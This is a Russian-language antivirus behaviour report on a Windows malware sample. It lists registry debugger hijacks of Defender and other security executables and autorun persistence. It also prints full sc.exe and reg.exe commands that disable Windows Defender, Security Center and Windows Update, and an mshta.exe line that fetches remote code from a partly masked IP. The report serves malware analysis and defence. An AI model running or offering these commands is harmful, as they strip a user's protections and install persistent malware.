Техническая информация
Для обеспечения автозапуска и распространения:
Модифицирует следующие ключи реестра:
- [<HKLM>\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mpuxsrv.exe] 'Debugger' = '%WINDIR%\1.exe'
- [<HKLM>\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mpcmdrun] 'Debugger' = '%WINDIR%\1.exe'
- [<HKLM>\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\k9filter.exe] 'Debugger' = '%WINDIR%\1.EXE'
- [<HKLM>\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msascui.exe] 'Debugger' = '"%WINDIR%\1.exe" /z'
- [<HKLM>\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msmpeng.exe] 'Debugger' = '"%WINDIR%\1.exe" /z'
- [<HKLM>\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mpsvc.dll] 'Debugger' = '%WINDIR%\1.exe'
- [<HKCU>\Software\Microsoft\Windows\CurrentVersion\Run] 'ZSFT' = '%APPDATA%\svc-qgkf.exe'
- [<HKLM>\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MSseces] 'Debugger' = '%WINDIR%\1.exe'
- [<HKLM>\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msascui] 'Debugger' = '%WINDIR%\1.exe'
- [<HKLM>\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MSconfig.exe] 'Debugger' = '%WINDIR%\1.exe'
Создает следующие сервисы:
- [<HKLM>\SYSTEM\ControlSet001\Services\bckd] 'ImagePath' = '33.sys'
Вредоносные функции:
Для затруднения выявления своего присутствия в системе
блокирует:
- Средство контроля пользовательских учетных записей (UAC)
Создает и запускает на исполнение:
- '%APPDATA%\svc-qgkf.exe'
Запускает на исполнение:
- '<SYSTEM32>\sc.exe' config windefend start= disabled
- '<SYSTEM32>\sc.exe' config luafv start= disabled
- '<SYSTEM32>\sc.exe' config wscsvc start= disabled
- '<SYSTEM32>\reg.exe' add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msascui.exe" /v "Debugger" /t REG_SZ /d "\"%WINDIR%\1.exe\" /z" /f
- '<SYSTEM32>\reg.exe' add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msmpeng.exe" /v "Debugger" /t REG_SZ /d "\"%WINDIR%\1.exe\" /z" /f
- '<SYSTEM32>\sc.exe' config msmpsvc start= disabled
- '<SYSTEM32>\sc.exe' stop wscsvc
- '<SYSTEM32>\sc.exe' stop bckwfs
- '<SYSTEM32>\mshta.exe' "http://20#.#34.215.211/?0=#############################################"
- '<SYSTEM32>\reg.exe' add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "ZSFT" /t REG_SZ /d "%APPDATA%\svc-qgkf.exe" /f
- '<SYSTEM32>\sc.exe' config wuauserv start= disabled
- '<SYSTEM32>\sc.exe' stop wuauserv
- '<SYSTEM32>\sc.exe' config bckwfs start= disabled
Завершает или пытается завершить
следующие системные процессы:
- <SYSTEM32>\cmd.exe
большое количество пользовательских процессов.
Изменяет следующие настройки браузера Windows Internet Explorer:
- [<HKCU>\Software\Microsoft\Windows\CurrentVersion\Policies\Associations] 'LowRiskFileTypes' = '.zip;.rar;.nfo;.txt;.exe;.bat;.com;.cmd;.reg;.msi;.htm;.html;.gif;.bmp;.jpg;.avi;.mpg;.mpeg;.mov;.mp3;.m3u;.wav;'
- [<HKCU>\Software\Microsoft\Windows\CurrentVersion\Policies\Attachments] 'SaveZoneInformation' = '00000001'
Пытается завершить работу операционной системы Windows.
Изменения в файловой системе:
Создает следующие файлы:
- %HOMEPATH%\Local Settings\Temporary Internet Files\Content.IE5\KHMHGZ4F\205.234.215[1]
- %HOMEPATH%\Local Settings\Temporary Internet Files\Content.IE5\KHMHGZ4F\checkip.dyndns[1]
- %APPDATA%\svc-qgkf.exe
Удаляет следующие файлы:
- %HOMEPATH%\Local Settings\Temporary Internet Files\Content.IE5\KHMHGZ4F\checkip.dyndns[1]
Самоудаляется.
Сетевая активность:
Подключается к:
- '20#.#34.215.211':80
- 'ch####p.dyndns.org':80
- 'localhost':1037
TCP:
Запросы HTTP GET:
- 20#.#34.215.211/?0=#############################################
- ch####p.dyndns.org/
UDP:
- DNS ASK ch####p.dyndns.org
Другое:
Ищет следующие окна:
- ClassName: 'Shell_TrayWnd' WindowName: '(null)'
- ClassName: 'Indicator' WindowName: '(null)'
